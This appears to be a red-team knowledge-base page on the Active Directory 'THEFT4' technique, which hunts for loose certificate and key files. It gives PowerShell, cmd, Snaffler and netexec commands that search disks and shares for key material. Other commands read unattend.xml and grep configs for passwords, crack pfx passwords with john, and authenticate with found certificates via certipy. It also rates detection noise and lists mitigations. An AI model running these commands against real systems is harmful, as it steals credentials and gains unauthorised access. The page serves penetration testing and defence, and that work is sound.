theft4-finding-certificate-files.md (3748B)
1 --- 2 title: "THEFT4 — Finding Certificate Files" 3 description: "No cryptography needed here. Admins and automation constantly leave certificate material lying around: exported .pfx backups, id_rsa-style key files…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs"] 7 tools: ["NetExec", "Certipy", "John", "Snaffler", "OpenSSL"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/THEFT4 — Finding Certificate Files.md" 11 --- 12 # THEFT4 — Finding Certificate Files 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Credential Theft (file hunting) | 19 | **Difficulty** | Low | 20 | **Pre-requisites** | Read access to a filesystem / share | 21 | **Tools** | Seatbelt, PowerShell, findstr, Snaffler, Certify | 22 | **OPSEC Noise** | Low — read-only file discovery | 23 | **One-liner** | Hunt loose certificate and key files (`.pfx .p12 .pem .key`) left on disk, shares, and in config/unattend files, then authenticate with any that carry an auth EKU. | 24 25 *** 26 27 ## What Is THEFT4? 28 29 No cryptography needed here. Admins and automation constantly leave certificate material lying around: exported `.pfx` backups, `id_rsa`-style key files, `unattend.xml`/`sysprep` blobs, IIS bindings, web-app config, and network-share dumps. THEFT4 is systematic file hunting for these artefacts. 30 31 *** 32 33 ## Step 1 — Hunt Locally 34 35 ```powershell 36 # PowerShell — recursive search for common cert/key extensions 37 Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue ` 38 -Include *.pfx,*.p12,*.pem,*.key,*.crt,*.cer,*.p7b,*.pkcs12,*.jks,*.keystore 2>$null | 39 Select-Object FullName, Length, LastWriteTime 40 ``` 41 42 ```cmd 43 :: cmd / findstr sweep 44 dir C:\ /s /b | findstr /i "\.pfx \.p12 \.pem \.key \.crt \.cer" 45 46 :: Credentials frequently embedded here 47 findstr /s /i "password" C:\*.xml C:\*.config 2>nul 48 type C:\Windows\Panther\unattend.xml 49 ``` 50 51 ```powershell 52 # Seatbelt — dedicated modules 53 Seatbelt.exe Certificates 54 Seatbelt.exe InterestingFiles 55 56 # Certify — find cert files 57 Certify.exe find /files 58 ``` 59 60 *** 61 62 ## Step 2 — Hunt Shares 63 64 ```bash 65 # Snaffler (from a Windows foothold) — classifies findings, flags cert/key files 66 Snaffler.exe -s -o snaffler.log 67 68 # From Linux — spider readable shares with netexec, then grep 69 netexec smb $TARGET -u user -p pass -M spider_plus 70 ``` 71 72 *** 73 74 ## Step 3 — Triage & Authenticate 75 76 ```bash 77 # Inspect what an unknown pfx contains (identity, EKU, expiry) 78 certipy-ad cert -pfx found.pfx -password '' -nokey -out /dev/stdout # peek 79 openssl pkcs12 -info -in found.pfx -nodes # or openssl 80 81 # If it has Client Auth / PKINIT EKU and a private key -> authenticate 82 certipy-ad auth -pfx found.pfx -dc-ip $TARGET 83 ``` 84 85 > [!tip] Password-protected pfx? 86 > Crack it with John: `pfx2john found.pfx > pfx.hash && john --wordlist=rockyou.txt pfx.hash`. See john-cheatsheet (`--format=pfx`). 87 88 *** 89 90 ## OPSEC Considerations 91 92 | Action | Artefact | Noise | 93 | :-- | :-- | :-- | 94 | Recursive `Get-ChildItem` | high disk I/O, possible EDR heuristic | 🟡 Medium | 95 | Share spidering | SMB access logs on file servers | 🟡 Medium | 96 | Reading a file | file-audit events (if enabled) | 🟢 Low | 97 98 *** 99 100 ## Mitigation 101 102 - Never store `.pfx`/private keys on shares or in config/unattend files; use a secrets vault. 103 - Scan the estate for stray key material (the same tools defenders can run). 104 - Password-protect and short-date any exported certs; rotate on exposure. 105 - Enable file-access auditing on sensitive shares. 106 107 *** 108 109 ## See Also 110 111 - _ADCS Attack Methodology Guide · THEFT1 — Exporting Certificates and Keys · john-cheatsheet 112 - Sources: SpecterOps *Certified Pre-Owned*; [Seatbelt](https://github.com/GhostPack/Seatbelt)